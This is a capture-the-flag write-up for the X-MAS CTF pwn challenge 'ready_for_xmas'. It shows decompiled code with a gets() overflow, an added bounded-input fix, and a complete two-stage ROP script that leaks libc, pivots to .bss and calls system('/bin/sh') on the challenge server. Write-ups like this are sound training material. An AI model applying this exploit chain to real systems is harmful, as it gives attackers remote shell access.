Tags: rop pwnscripts ret2libc
Rating:
SOLVED
Are you ready for aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/bin/shawhkj\xffwaa ?
Target: nc challs.xmas.htsp.ro 2001
Author: Th3R4nd0m
Files: ready_for_xmas.zip
pwnscripts
important stuff in decompiler:

    int system(const char *s) {
        return system(s);
    }

    void set_rdx_as_r15() {
        // this sets rdx = r15
    }

    int main() {
        char haystack[64]; // [rsp+0h] [rbp-40h] BYREF
        setvbuf(stdin, 0LL, 2, 0LL);
        setvbuf(stdout, 0LL, 2, 0LL);
        if ( has_main_occured )
            exit(0);
        memset(aCatFlag, 0, sizeof(aCatFlag));
        puts("Hi. How are you doing today, good sir? Ready for Christmas?");
        gets(haystack); // !!!! vuln !!!!
        if ( strstr(haystack, "sh") || strstr(haystack, "cat") )
            exit(0); // if haystack contains these strings
        has_main_occured = 1;
        mprotect(&has_main_occured, 1uLL, 1);
        return 0;
    }
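As an added example (not part of the original writeup or the challenge source), here is the same main() logic with the unbounded gets() replaced by a bounded line reader, which is the fix that removes the overflow no matter what the strstr() blacklist does. read_line_bounded, handle_greeting, check_input_string and check_repeated are names chosen here; the mprotect()/has_main_occured bookkeeping is left out.

```c
// Added example: bounded replacement for the challenge's gets(haystack).
// Names below are chosen for this example and are not from the challenge.
#include <stdio.h>
#include <string.h>

#define HAYSTACK_SZ 64   // same 64-byte buffer as the decompiled main()

/* Read one line into buf (capacity cap) and strip the newline.
 * Returns the line length, or -1 if nothing could be read or the line did
 * not fit; an oversized line is drained so the next read starts clean, and
 * the caller rejects it instead of silently truncating. */
int read_line_bounded(char *buf, size_t cap, FILE *in) {
    if (cap == 0 || fgets(buf, (int)cap, in) == NULL) return -1;
    size_t len = strlen(buf);
    if (len > 0 && buf[len - 1] == '\n') {
        buf[--len] = '\0';
        return (int)len;
    }
    /* No newline in the buffer: the line either ended at EOF, filled the
     * buffer exactly, or was longer than cap-1 bytes. */
    int c = fgetc(in);
    if (c == EOF || c == '\n') return (int)len;   // fit exactly (or EOF-terminated)
    while (c != '\n' && c != EOF) c = fgetc(in);  // drain the oversized line
    return -1;
}

/* Mirrors the challenge's main(): bounded read, then the same string filter.
 * Returns 0 if accepted, 1 if the input was missing or too long, 2 if filtered. */
int handle_greeting(FILE *in) {
    char haystack[HAYSTACK_SZ];
    int n = read_line_bounded(haystack, sizeof haystack, in);
    if (n < 0) return 1;
    if (strstr(haystack, "sh") || strstr(haystack, "cat")) return 2;
    return 0;
}

/* Test helper: feed a constructed input string through handle_greeting(). */
int check_input_string(const char *s) {
    FILE *f = tmpfile();
    if (!f) return -1;
    fputs(s, f);
    rewind(f);
    int rc = handle_greeting(f);
    fclose(f);
    return rc;
}

/* Test helper: a line of `count` copies of `ch` followed by a newline. */
int check_repeated(char ch, int count) {
    FILE *f = tmpfile();
    if (!f) return -1;
    for (int i = 0; i < count; i++) fputc(ch, f);
    fputc('\n', f);
    rewind(f);
    int rc = handle_greeting(f);
    fclose(f);
    return rc;
}
```

A 63-character line is the longest that fits the 64-byte buffer with its terminator; anything longer is rejected as a whole rather than written past the end of haystack, so the saved rbp and return address stay untouched.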
checksec:

    [*] chall
        Arch:     amd64-64-little
        RELRO:    Partial RELRO
        Stack:    No canary found
        NX:       NX enabled
        PIE:      No PIE (0x400000)
This challenge was presumably designed with the idea of disabling mprotect with the inline assembly function. Or something. The set_rdx_as_r15() function is a little bit confusing, considering you can use ret2csu to set rdx without anything special.

I'm also not entirely sure what the point of having a system() function was; I just busted through the challenge with a ROP to .bss to ROP to libc's /bin/sh.
    from pwnscripts import *
    context.binary = 'chall'
    context.libc_database = '../libc-database'  # local libc-database checkout
    context.libc = 'libc.so.6'                  # libc shipped with the challenge
    NOWHERE = 0x601900  # unused, writable .bss address used as the new stack
    r = remote('challs.xmas.htsp.ro', 2001)
    PAD = 0x48  # 0x40-byte haystack + 8-byte saved rbp, up to the return address

    # Stage 1: leak gets@got via puts, read stage 2 into NOWHERE, pivot there.
    # The strstr() filter only ever sees this first line.
    R = ROP(context.binary)
    R.raw(PAD*b'a')
    R.puts(context.binary.got['gets'])
    R.gets(NOWHERE)
    R.migrate(NOWHERE)
    r.sendlineafter('\n', R.chain())
    # puts prints the 6 significant bytes of the gets pointer; derive libc base
    context.libc.calc_base('gets', unpack_bytes(r.recvline(), 6))

    # Stage 2: read by the second gets() with no filter, so the chain can
    # point system() at the "/bin/sh" string inside libc.
    R = ROP(context.binary)
    R.system(context.libc.symbols['str_bin_sh'])
    r.sendline(R.chain())
    r.interactive()
X-MAS{l00ks_lik3_y0u_4re_r3ady}